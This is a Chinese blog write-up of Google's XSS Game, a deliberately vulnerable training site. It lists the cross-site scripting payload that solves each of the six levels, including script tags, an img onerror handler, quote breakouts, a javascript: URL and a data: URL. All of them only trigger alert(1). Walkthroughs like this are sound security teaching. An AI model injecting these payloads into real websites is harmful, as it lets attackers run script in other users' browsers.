首页 > 其他分享 >Google XSS Game

Google XSS Game

时间:2023-02-02 17:24:29浏览次数:52  
标签:XSS Google Level URL 标签 alert Game html

XSS game (xss-game.appspot.com)

这是一款谷歌的 XSS 游戏,总共有 6 个级别

Level 1

无需转义,直接编辑 URL 栏或者搜索框中都可以执行

<script>alert(1)</script>

Level 2

留言板中放入<script>alert(1)</script>发现不弹窗,说明<script> 标签不起作用,转译成了HTML实体,可以选择其他能够触发 JavaScript 代码的命令

// 标签与属性一起使用,onerror 事件会在文档或图像加载过程中发生错误时被触发。
<img src='#' one rror=alert(1) />

Level 3

// 查看源代码
function chooseTab(num) {
        // Dynamically load the appropriate image.
        var html = "Image " + parseInt(num) + "<br>";
        html += "<img src='/static/level3/cloud" + num + ".jpg' />";
        $('#tabContent').html(html);
// 用 ' 闭合 src 属性,用 /> 闭合 img 标签
' one rror='alert(1)'/>

Level 4

// 闭合 startTimer() 函数,用 , 连接写入 alert() 方法
// onl oad 事件在图片加载完成后立即执行
100'),alert('1

Level 5

// 这是基于 DOM 的 XSS,在邮件中插入
javascript:alert(1)

// 插入后
<a href="javascript:alert(1)">

Level 6

Data URL - HTTP | MDN (mozilla.org)

在浏览器中,有一些用于访问资源或脚本的协议,称作伪协议

data 伪协议

// Data URL,允许内容创建者向文档中嵌入小文件
data:text/javascript,alert(1)

标签:XSS,Google,Level,URL,标签,alert,Game,html
From: https://www.cnblogs.com/yii-ling/p/17086693.html

相关文章

  • [LeetCode]Jump Game II
    QuestionGivenanarrayofnon-negativeintegers,youareinitiallypositionedatthefirstindexofthearray.Eachelementinthearrayrepresentsyourmaximu......
  • Awesome GameDev
    个人收集的与游戏开发相关的资源。 素材1. AI生成素材3D素材1. Devassets 设计像素1. 像素辅助利器:特效/粒子/流体/动画/节点编辑为一体SpriteMancer......
  • Good Bye 2022: 2023 is NEAR D. Koxia and Game(数据结构,图论,数学)
    题目链接:https://codeforces.com/problemset/problem/1770/D 大致题意:有三个数组,每个数组的长度为n,数组里面的每个数在(1-n)。现在,对于每一位上面的数,Mahiru可以去掉其中......
  • Google的三架马车--Google File System (GFS)
    背景介绍国际方面,数据库理论研究起步于20世纪60年代,并于20世纪70年代开始产业化,逐步形成了成熟的IOE(IBM提供硬件,Oracle提供数据库软件,EMC提供存储介质)应用模式,开始占领全......
  • Google的三架马车--Google MapReduce
    背景介绍国际方面,数据库理论研究起步于20世纪60年代,并于20世纪70年代开始产业化,逐步形成了成熟的IOE(IBM提供硬件,Oracle提供数据库软件,EMC提供存储介质)应用模式,开始占领全......
  • CF1780D Bit Guessing Game
    题目链接-https://codeforces.com/contest/1780/problem/D终端有一个需要猜的数\(x\),\(x\leq10^9\),每轮终端会给你返回一个数\(a\)表示\(x\)在二进制下有多少个......
  • CF1780E Bit Guessing Game
    题目链接-https://codeforces.com/contest/1780/problem/E给定一张无向图,其中有\(R-L+1\)个点,编号从\(L\)到\(R\),每两个点\(u\),\(v\)间连一条边,边权为\(gc......
  • 爬google podcast 笔记
    问题1https://stackoverflow.com/questions/57217924/pyppeteer-errors-browsererror-browser-closed-unexpectedlyexportno_proxy=localhost,127.0.0.1......
  • 分享两个好用的XSS漏扫工具(工具)
    =================免责声明:希望大家以遵守《网络安全法》相关法律,本团队发表此文章仅用于研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本团队无关。=======......
  • Guava:google公司开发的一款Java类库扩展工具包
    Guava是google公司开发的一款Java类库扩展工具包文档https://github.com/google/guavahttps://github.com/google/guava/wikihttps://guava.dev/releases/snapshot-jre......